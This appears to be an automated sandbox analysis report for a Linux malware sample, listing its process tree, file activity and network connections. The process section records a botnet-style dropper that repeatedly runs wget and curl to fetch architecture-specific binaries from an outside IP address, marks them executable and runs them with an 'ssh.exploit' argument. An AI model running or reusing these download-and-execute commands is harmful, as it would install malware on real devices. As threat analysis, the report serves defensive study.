| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/gucci | /tmp/18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 | N/A |
Processes
/tmp/18d2223535e45636ae395a0ff6f871b2_JaffaCakes118
[/tmp/18d2223535e45636ae395a0ff6f871b2_JaffaCakes118]
/usr/bin/wget
[wget http://192.3.122.100/bins/arm]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/arm]
/bin/cat
[cat arm]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-7be067a6c62a4da9b1091f4ce1640774-systemd-timedated.service-KTHSBr]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/arm5]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/arm5]
/bin/cat
[cat arm5]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-7be067a6c62a4da9b1091f4ce1640774-systemd-timedated.service-KTHSBr]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/arm6]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/arm6]
/bin/cat
[cat arm6]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-7be067a6c62a4da9b1091f4ce1640774-systemd-timedated.service-KTHSBr]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/arm7]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/arm7]
/bin/cat
[cat arm7]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-7be067a6c62a4da9b1091f4ce1640774-systemd-timedated.service-KTHSBr]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/m68k]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/m68k]
/bin/cat
[cat m68k]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-7be067a6c62a4da9b1091f4ce1640774-systemd-timedated.service-KTHSBr]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/mips]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/mips]
/bin/cat
[cat mips]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-7be067a6c62a4da9b1091f4ce1640774-systemd-timedated.service-KTHSBr]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/mpsl]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/mpsl]
/bin/cat
[cat mpsl]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-7be067a6c62a4da9b1091f4ce1640774-systemd-timedated.service-KTHSBr]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/ppc]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/ppc]
/bin/cat
[cat ppc]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-7be067a6c62a4da9b1091f4ce1640774-systemd-timedated.service-KTHSBr]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/sh4]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/sh4]
/bin/cat
[cat sh4]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-7be067a6c62a4da9b1091f4ce1640774-systemd-timedated.service-KTHSBr]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/spc]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/spc]
/bin/cat
[cat spc]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-7be067a6c62a4da9b1091f4ce1640774-systemd-timedated.service-KTHSBr]
/tmp/gucci
[./gucci ssh.exploit]
/usr/bin/wget
[wget http://192.3.122.100/bins/x86]
/usr/bin/curl
[curl -O http://192.3.122.100/bins/x86]
/bin/cat
[cat x86]
/bin/chmod
[chmod +x 18d2223535e45636ae395a0ff6f871b2_JaffaCakes118 gucci systemd-private-7be067a6c62a4da9b1091f4ce1640774-systemd-timedated.service-KTHSBr]
/tmp/gucci
[./gucci ssh.exploit]
Network
| Country | Destination | Domain | Proto |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp | |
| US | 192.3.122.100:80 | tcp |
Files
memory/715-1-0xb6794000-0xb67a5044-memory.dmp
memory/722-2-0xb6768000-0xb6779044-memory.dmp
memory/728-3-0xb675a000-0xb676b044-memory.dmp